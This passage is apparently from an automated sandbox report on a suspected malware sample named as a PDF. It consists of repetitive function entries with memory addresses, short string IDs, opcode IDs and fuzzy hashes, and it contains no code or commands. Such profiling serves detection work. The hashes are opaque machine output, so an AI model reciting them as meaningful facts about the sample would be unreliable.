                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: tobq
                                • API String ID: 0-4133170245
                                • Opcode ID: a8b65de19708c9dd3d9ff2f06e31436e1b9c001e9a4ff0ebb7154468e8e5cd39
                                • Instruction ID: 10ef5ac14d9e75e19e4f53f2c1f59159d1ec952bba30e161b41e103b6f76c92e
                                • Opcode Fuzzy Hash: a8b65de19708c9dd3d9ff2f06e31436e1b9c001e9a4ff0ebb7154468e8e5cd39
                                • Instruction Fuzzy Hash: 5F517A34A041448FD719CF29E998BA97BF2FF89314F2880A9D409DB369CB34DD85DB16
                                Function 0605F8E8 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: E+b
                                • API String ID: 0-3176853818
                                • Opcode ID: 59cb563be713e8ce3bcd226b37d827b5eeda7f798376b4c41b6d204dfc01d8e8
                                • Instruction ID: f1d0c17c895d1a0c469b60475fe78236f95517d1ed6c84089e9dcddf8fd05838
                                • Opcode Fuzzy Hash: 59cb563be713e8ce3bcd226b37d827b5eeda7f798376b4c41b6d204dfc01d8e8
                                • Instruction Fuzzy Hash: EB512774E40609AFDB44DFA9E8886AEBBF6FF89300F10D469D815AB354DB385941CF50
                                Function 008732A8 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: tobq
                                • API String ID: 0-4133170245
                                • Opcode ID: ecd5b43c5826858dbb9c1752f663acd3934380d280bd4e3bdc49b6d38d47a222
                                • Instruction ID: eefe4fba146905945bbb40ef35f0a82861953e4be51cc6f8dc07b0645f9bff9b
                                • Opcode Fuzzy Hash: ecd5b43c5826858dbb9c1752f663acd3934380d280bd4e3bdc49b6d38d47a222
                                • Instruction Fuzzy Hash: F2511834A00104CFD718DF29E588BA9B7E2FB98314F298069D409EB369CB74DD85DB56
                                Function 00871D5B Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 3d29cbb0e33a940774e347bb61ae9a715667c7951e61d6ca29c96e34195b05d0
                                • Instruction ID: a667c5c5fc98f4f9a5fb44686f8988843d2c8953162714cb1b8b585a107650b8
                                • Opcode Fuzzy Hash: 3d29cbb0e33a940774e347bb61ae9a715667c7951e61d6ca29c96e34195b05d0
                                • Instruction Fuzzy Hash: 7B312730A042048FDB65CF5CC188BE8BBE3FB45310F258265D819ABAA8C734ED84DF51
                                Function 06040642 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: L
                                • API String ID: 0-2909332022
                                • Opcode ID: 54f070ae364b6afca26b4cee15c5c16512611b7e7d54dbdbb98878294e2ceeee
                                • Instruction ID: a26643d0cc3ff70b64659780730d2ef22472101d7800b1fd93680c9bb13ff9aa
                                • Opcode Fuzzy Hash: 54f070ae364b6afca26b4cee15c5c16512611b7e7d54dbdbb98878294e2ceeee
                                • Instruction Fuzzy Hash: B9316174A0122ACFDBB4DF18D985AA9FBF5FB48300F1080E6D909A7755DB34AE859F40
                                Function 00872170 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: h^q
                                • API String ID: 0-1951170149
                                • Opcode ID: ec89754e432ac21c5619dd1ab9758a906b2d9843da08bbc0152bd5173e359717
                                • Instruction ID: e8e4bbaf127dfe326353645d6a3e5384a69d3c370074326acd7671e5f9d1a341
                                • Opcode Fuzzy Hash: ec89754e432ac21c5619dd1ab9758a906b2d9843da08bbc0152bd5173e359717
                                • Instruction Fuzzy Hash: 4D11C232C1838B8ECB029BB4D8505EDBFB1FFC6310F1A4662D150BB165EB70158ACBA1
                                Function 00871B60 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: h^q
                                • API String ID: 0-1951170149
                                • Opcode ID: 5fcefb0f73e275bdd49c5dd8d1c3a7a6a89481cc6e59e0a14b8f5cc8e019cf74
                                • Instruction ID: 334e46e7fcd4c1f6bd25e3205b340e07068841a41b6a8419f434faec45de544c
                                • Opcode Fuzzy Hash: 5fcefb0f73e275bdd49c5dd8d1c3a7a6a89481cc6e59e0a14b8f5cc8e019cf74
                                • Instruction Fuzzy Hash: FF01B532D1464A8BCF059BBDD8545DDFBB2EFCA311F118616C111B7164EB70214BCBA0
                                Function 008721A0 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: h^q
                                • API String ID: 0-1951170149
                                • Opcode ID: 4eea298d84854e1d8cba2b654b9a9b330a40c8dc9fbf8aa789ddae5f08ee399b
                                • Instruction ID: 85a192d33a31b75d858dd6f016d11a6908aeb61f655a3d91d6a539ae7e45581d
                                • Opcode Fuzzy Hash: 4eea298d84854e1d8cba2b654b9a9b330a40c8dc9fbf8aa789ddae5f08ee399b
                                • Instruction Fuzzy Hash: 2C01A232D5464B8ACF109FB9D8505EEBFB2EFCA321F154612D11077160EB70219BCBA1
                                Function 00871B70 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: h^q
                                • API String ID: 0-1951170149
                                • Opcode ID: 91b09df5d5797f19ad465388f9ff2d6afb3cd01c13ede4f867be594372f94ad4
                                • Instruction ID: 683b7f6235d757d56617e087f7f77bf91ad729f1fc4432eebd2d474ccfc179d5
                                • Opcode Fuzzy Hash: 91b09df5d5797f19ad465388f9ff2d6afb3cd01c13ede4f867be594372f94ad4
                                • Instruction Fuzzy Hash: 68016232D5061B87CF14DBB9D8044DEF7B6EFCA710F118616D511B7264EB70258ACBA1
                                Function 008721B0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: h^q
                                • API String ID: 0-1951170149
                                • Opcode ID: 466ade3b9451820808e2db80e33c4dc7945527904c85f32282d804e9a3c9525d
                                • Instruction ID: d134344fe01eba1d5616e620233386316a8890184acaac729f9076ad60892f6b
                                • Opcode Fuzzy Hash: 466ade3b9451820808e2db80e33c4dc7945527904c85f32282d804e9a3c9525d
                                • Instruction Fuzzy Hash: 30F08C32D1060B87CB549BA9D8044DEBBB6EFCA320F254612D11077164EB70219ACBA1
                                Function 008722A7 Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b4512a6c38b90e05590cb5b4f805e2fb4f29dd934784757bfd99a532249fcdf
                                • Instruction ID: 626ec4040be0a7318dad97f69fe8ab0a5f66ab12b632e9fa44bd308f8a6d2098
                                • Opcode Fuzzy Hash: 8b4512a6c38b90e05590cb5b4f805e2fb4f29dd934784757bfd99a532249fcdf
                                • Instruction Fuzzy Hash: 78912734A04148CFEB09CF69D444BA9B7F2FB89315F68C266D409AB3A9C778D985CB11
                                Function 008722B8 Relevance: .2, Instructions: 212COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7419644fe333723e61ba4fd50f8a969c68f8bbe43e8758b1a1b651eb681bbc56
                                • Instruction ID: 098057e4118a87699d0fe8670676729d49a5d1507166f0a897de1fae56bfc22a
                                • Opcode Fuzzy Hash: 7419644fe333723e61ba4fd50f8a969c68f8bbe43e8758b1a1b651eb681bbc56
                                • Instruction Fuzzy Hash: C1911730A04108CFEB19CF59D444BA9B3F2FB89315F68C266D409AB3A9C778DD85CB11
                                Function 008723D9 Relevance: .2, Instructions: 204COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ca2704935d572b5d0172b2af3cddac33a2ea207bc667c18521a84efd114ca67
                                • Instruction ID: ca3d8262c25eb7d1ec9c8db1f4832c504927149285a1cffb574f85e55dbd4822
                                • Opcode Fuzzy Hash: 5ca2704935d572b5d0172b2af3cddac33a2ea207bc667c18521a84efd114ca67
                                • Instruction Fuzzy Hash: EE911634A04108CFEB19CF59D484BA9B3F2FB89315F68C265D009AB3A9C778DD85CB11
                                Function 00871D0F Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e587f0d7dd4476b891304aebae1759f506f22c1eadd7e22ae6c426558cadf617
                                • Instruction ID: bd33aa884d7b63e1d19392bd6478d431c192610a88961207d42b4636477987cf
                                • Opcode Fuzzy Hash: e587f0d7dd4476b891304aebae1759f506f22c1eadd7e22ae6c426558cadf617
                                • Instruction Fuzzy Hash: FD41D330A042488FDB65CF5CC188BE9BBE3FB85314F658264D8199BAA8D375ED85CF10
                                Function 00871F3E Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ed7d3dd998b3b74c9ae177fe77da2f249767593e36c59afeea189a77446c079
                                • Instruction ID: 34dc1ae2dd6ad71663ced2e7bb33edd6f61a93f711d258f92c5192df6e92f076
                                • Opcode Fuzzy Hash: 1ed7d3dd998b3b74c9ae177fe77da2f249767593e36c59afeea189a77446c079
                                • Instruction Fuzzy Hash: 4741C230A042448FDB65CB4CC188BE9BBE2FB45314F6582A4D819AFAA9C775ED84DF50
                                Function 00871E07 Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79716965b6be0684d08ab55734120abb060d4fa9b56f693e21c3c34f33e89ff1
                                • Instruction ID: 8180dd3ac5875e08d39fb734055ba97313623f99032e01c1cbb2fa7482a41834
                                • Opcode Fuzzy Hash: 79716965b6be0684d08ab55734120abb060d4fa9b56f693e21c3c34f33e89ff1
                                • Instruction Fuzzy Hash: 1741D2309042448FDB65CB5CC588BE8BBF3FB45314F6982A4D819ABAA8C375AD84DF10
                                Function 00873530 Relevance: .1, Instructions: 87COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42f16733dea9d462d603905e00a9328b2e230dcd715e3c36033f4730657d24f1
                                • Instruction ID: 6bafbe99117beee0e87d100fcca976208f9516e07632ab4aec8afb2a126b74f7
                                • Opcode Fuzzy Hash: 42f16733dea9d462d603905e00a9328b2e230dcd715e3c36033f4730657d24f1
                                • Instruction Fuzzy Hash: 392101317001148BCB09EA2D9454AAEB7D7FFC8310F5480B9D40ADB358CF34EE499B82
                                Function 00871FF4 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 380ec9ee9937cb1affbf728d424e28d55f369bf13739028f24ba4b2f2f8d9398
                                • Instruction ID: e73806baa8559779e0a64d0d6b0067d8fbf7d2c16323dc9d017ad6a8bba45cbc
                                • Opcode Fuzzy Hash: 380ec9ee9937cb1affbf728d424e28d55f369bf13739028f24ba4b2f2f8d9398
                                • Instruction Fuzzy Hash: F941E2309042448FDB65CF5CC188BE9BBF2FB45314F6982A5D819AFAA8D335AD84DF50
                                Function 00871DD7 Relevance: .1, Instructions: 85COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb64ec0be2dea251a307467611a2afa4a21d5d604814643a02bfee5eba35afed
                                • Instruction ID: 23e216dfb29ab7918b965794a745b05a634800fccc6908dd04ce32e370965369
                                • Opcode Fuzzy Hash: bb64ec0be2dea251a307467611a2afa4a21d5d604814643a02bfee5eba35afed
                                • Instruction Fuzzy Hash: F031C230A042448FDB65CF5CC188BE9BBE3FB45314F6582A4D8199FAA8C375AD84DF50
                                Function 0087204B Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c3a7d9e1e546e37a632ea3fb6c9cfc56044c22a053ad8fe9d68ab306b773134
                                • Instruction ID: 8f2e9d0c38808bf772b0bbfcfb205c6ec0827aab035c30476fadc91039c259c2
                                • Opcode Fuzzy Hash: 5c3a7d9e1e546e37a632ea3fb6c9cfc56044c22a053ad8fe9d68ab306b773134
                                • Instruction Fuzzy Hash: 7131D0309042448FDB65CF5CC188BE8BBE2FB45324F6582A4D819AFAA8C375AD84DF50
                                Function 00871EDB Relevance: .1, Instructions: 83COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed0dc64ab5d3fef085d4dbcb930ffa9d0c51cec542305b99460cf427de3af8fb
                                • Instruction ID: 74f14dd1b5d091f47cc7b1c0651430cb0de2c1c23b69974b1c9442ce91c60f1e
                                • Opcode Fuzzy Hash: ed0dc64ab5d3fef085d4dbcb930ffa9d0c51cec542305b99460cf427de3af8fb
                                • Instruction Fuzzy Hash: 4C31D030A042448FDB65CB5CC188BE9BBE3FB85314F698264D8199BAA8D335AD85DE50
                                Function 00871DBD Relevance: .1, Instructions: 82COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 059f5f03539eba764f0fe95c10bbae05475e8275dba5fde221efba5da75971dc
                                • Instruction ID: 64f374bf9222652b7299d1e1b5f1dd91be3ce73a4d308c6d6db6af0003986a15
                                • Opcode Fuzzy Hash: 059f5f03539eba764f0fe95c10bbae05475e8275dba5fde221efba5da75971dc
                                • Instruction Fuzzy Hash: 6831E2309042488FDB65CF5CC188BE9BBF2FB45314F6582A1D819ABAA8C335AD84DF50
                                Function 0605BC30 Relevance: .1, Instructions: 82COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2f90015665dce6d068fae2e7a543b39a56b75dfd7f3409ef84852045fa8e77d
                                • Instruction ID: 589415f3cce070100f12584cbb237f2d05789271798228e15b4b1aec3b3fdcea
                                • Opcode Fuzzy Hash: a2f90015665dce6d068fae2e7a543b39a56b75dfd7f3409ef84852045fa8e77d
                                • Instruction Fuzzy Hash: EC315770E44609CFEB44CFA9C4946EFBFF6AB88314F128865C905B7340EB71A980CB94
                                Function 0087C140 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2eb6a6e0b4e9b733e869cefd686415985f54277592814c214cb1d503d5d67e5f
                                • Instruction ID: 65a951eefffe12963ea1d3927bc76bd743644b9d6e1627a78c2044228e6c644b
                                • Opcode Fuzzy Hash: 2eb6a6e0b4e9b733e869cefd686415985f54277592814c214cb1d503d5d67e5f
                                • Instruction Fuzzy Hash: BA3106B090520CDFDB00EFA8D4487ADBBF1FB4A305F64C0A9D509E725AD7748A85CB62
                                Function 00873520 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 833cae1438ef753e9bad7bdaf96299b7b59e0cefa3feacca0b27048ee891aa2c
                                • Instruction ID: ae178b35557d33ea2335d56ef99737103a68eeca065a4f42498ba7e33af6b6f3
                                • Opcode Fuzzy Hash: 833cae1438ef753e9bad7bdaf96299b7b59e0cefa3feacca0b27048ee891aa2c
                                • Instruction Fuzzy Hash: CE21DE31B001148BDB15DA2D99946AEB7E7FFC8310F18C1B9D409EB259DB31EE499B82
                                Function 0082D01C Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191494250.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_82d000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 97d60bb7a58fcd93836317884685fb7b1183fa757964124a7a6f7e82bc09858c
                                • Instruction ID: 5dbff4927bc8de5992dbe3935c8fb5f5ce6a6370fcc1a81cada7ab9c2048a6ed
                                • Opcode Fuzzy Hash: 97d60bb7a58fcd93836317884685fb7b1183fa757964124a7a6f7e82bc09858c
                                • Instruction Fuzzy Hash: F5212271104744DFCB15DF14E9C4B26BF65FB88314F20C569E9098B266C33AD88ACBA2
                                Function 008716B1 Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dc668aab0879667c153d4ef303f05897c9169384bd4cc4bcbfe928603adcff75
                                • Instruction ID: f76f520e5e585e8c79eb57480379a8bec10bbace38d91f947575fad42f3f8eb7
                                • Opcode Fuzzy Hash: dc668aab0879667c153d4ef303f05897c9169384bd4cc4bcbfe928603adcff75
                                • Instruction Fuzzy Hash: D6110331D0824A8BDF049B69D8446EDBBB3EFD5320F698222C115B74A8E770A4CACB50
                                Function 0082D017 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191494250.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_82d000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                • Instruction ID: 92f15a559af37f644f187a2abb01a3eb125b07bf1dfda79a67711d24f074ad67
                                • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                • Instruction Fuzzy Hash: 2311BE76504680CFCB12CF14E5C4B1ABF72FB84314F24C6A9DD094B666C33AD85ACBA2
                                Function 06048CF4 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8753bf530d718f900e5362da2811218b19aabf1d55451daa764cca0da21d00d5
                                • Instruction ID: 2a31e6f8fee777864fba53a08bfeaa159640865dedaeb387f3866daa17398192
                                • Opcode Fuzzy Hash: 8753bf530d718f900e5362da2811218b19aabf1d55451daa764cca0da21d00d5
                                • Instruction Fuzzy Hash: 1021E374950129CBCB64EF28D888A99BBF1FB48304F6184E9D44EA7254DA309E85CF91
                                Function 0087FEE8 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f5fbd4b6d92306718143895674d2dca65b91ed921a428315a2c17b6267dcb3d5
                                • Instruction ID: 52e95efc80285319fbe9382d72a681e2b35016c39171184734d2add11c789b57
                                • Opcode Fuzzy Hash: f5fbd4b6d92306718143895674d2dca65b91ed921a428315a2c17b6267dcb3d5
                                • Instruction Fuzzy Hash: 5211C5B0E012099FCB48DFA9D9456AFFBF5FF88300F20846AD518E7355DA359A41CB91
                                Function 00870790 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86725728b53419e3c92dd97f93c7e94a3d5b2fe898e226ab5b4326b68625ad89
                                • Instruction ID: a6fd35fb1e6d87c078ff051bcec051ae6a437b837c0f722e210cb03968e5630f
                                • Opcode Fuzzy Hash: 86725728b53419e3c92dd97f93c7e94a3d5b2fe898e226ab5b4326b68625ad89
                                • Instruction Fuzzy Hash: A6012F8280E3D55FE3031B386C7828A3FA89E53258B1A01D7C0C4CF1F7E9598819C3AA
                                Function 00871621 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 243a85ad8a12c7d9f6f425527ea7aae0956128197f8040e20350a9bd76cc0d53
                                • Instruction ID: aa7383036e6b084b75ee47f96186bdd7122e1ac9e2d908007e4ab713ecf32f95
                                • Opcode Fuzzy Hash: 243a85ad8a12c7d9f6f425527ea7aae0956128197f8040e20350a9bd76cc0d53
                                • Instruction Fuzzy Hash: 640184719082448FEB05CF28D89879A7BF2FB91310F2D80AAD04CCB959D775A981CB51
                                Function 0087C098 Relevance: .0, Instructions: 41COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f4f8d67056c9a4e49c77b494bc066bd34189c061979530d3998d36792bf228f
                                • Instruction ID: 9f630aeea97ec7db60d5816fe52d9822e4dd9082089ffcc47b3e750eda793168
                                • Opcode Fuzzy Hash: 5f4f8d67056c9a4e49c77b494bc066bd34189c061979530d3998d36792bf228f
                                • Instruction Fuzzy Hash: 2AF06D30B442099FC754EAAD99007BA7BF5FB88315F14807E950CD7295EA718C41CBE1
                                Function 00871630 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
